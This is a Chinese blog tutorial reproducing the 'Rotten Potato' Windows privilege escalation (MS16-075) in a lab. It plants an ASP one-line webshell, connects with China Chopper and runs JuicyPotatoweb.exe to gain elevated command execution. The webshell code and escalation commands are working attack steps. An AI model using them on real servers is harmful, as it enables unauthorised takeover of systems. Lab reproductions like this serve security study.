Windows-烂土豆提权
创始人
2024-05-31 13:26:47
0

Windows-烂土豆提权

漏洞复现-烂土豆提权(MS16-075)

0x00 前言

烂土豆提权,即使用CVE-2016-3225(MS16-075)漏洞进行提权,当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞。成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。攻击者登录系统后,运行一个经特殊设计的应用程序利用此漏洞,从而控制受影响的系统。

影响版本:Windows 7、Windows 8.1、Windows 10、Windows Server 2008、Windows Server 2012等,以上版本系统若未安装相应补丁,则大概率存在此漏洞。

靶机攻击机
操作系统Windows 10 Version 1903kali
IP地址192.168.12.140192.168.12.135
备注主机安装IIS 8.0,且已上传asp一句话木马

0x01 搭建靶场

Windows Server 2012服务器管理器”->点击“添加角色和功能
在“服务器角色”中勾选“Web 服务器(IIS)”。
在“角色服务”中,展开“应用程序开发”,勾选“.NET Extensibility 4.5”、“ASP”等打开默认站点所在的目录,一般为“C:\inetpub\wwwroot”,创建一个upload文件夹,并赋予相关权限。
在upload目录下创建shell.asp,内容为asp的一句话木马,此处直接模拟攻击者上传一句话木马。<%execute request("a")%>

0x02 漏洞复现

1、菜刀连接

2、打开虚拟终端,查看当前用户及用户权限。

 whoamiwhoami /priv

image-20230301215526859

此处发现其拥有SeImpersonate权限。

3、使用菜刀上传漏洞利用工具,使用WebShell版的JuicyPotato工具JuicyPotatoweb。

image-20230301215717945

4、在虚拟终端中,切换到upload目录,使用JuicyPotatoweb.exe执行如下命令进行提权。

 JuicyPotatoweb.exe -p "whoami"

image-20230301215902773

相关内容

热门资讯

监控摄像头接入GB28181平... 流程简介将监控摄像头的视频在网站和APP中直播,要解决的几个问题是:1&...
Windows10添加群晖磁盘... 在使用群晖NAS时,我们需要通过本地映射的方式把NAS映射成本地的一块磁盘使用。 通过...
protocol buffer... 目录 目录 什么是protocol buffer 1.protobuf 1.1安装  1.2使用...
在Word、WPS中插入AxM... 引言 我最近需要写一些文章,在排版时发现AxMath插入的公式竟然会导致行间距异常&#...
【PdgCntEditor】解... 一、问题背景 大部分的图书对应的PDF,目录中的页码并非PDF中直接索引的页码...
修复 爱普生 EPSON L4... L4151 L4153 L4156 L4158 L4163 L4165 L4166 L4168 L4...
Fluent中创建监测点 1 概述某些仿真问题,需要创建监测点,用于获取空间定点的数据࿰...
educoder数据结构与算法...                                                   ...
MySQL下载和安装(Wind... 前言:刚换了一台电脑,里面所有东西都需要重新配置,习惯了所...
MFC文件操作  MFC提供了一个文件操作的基类CFile,这个类提供了一个没有缓存的二进制格式的磁盘...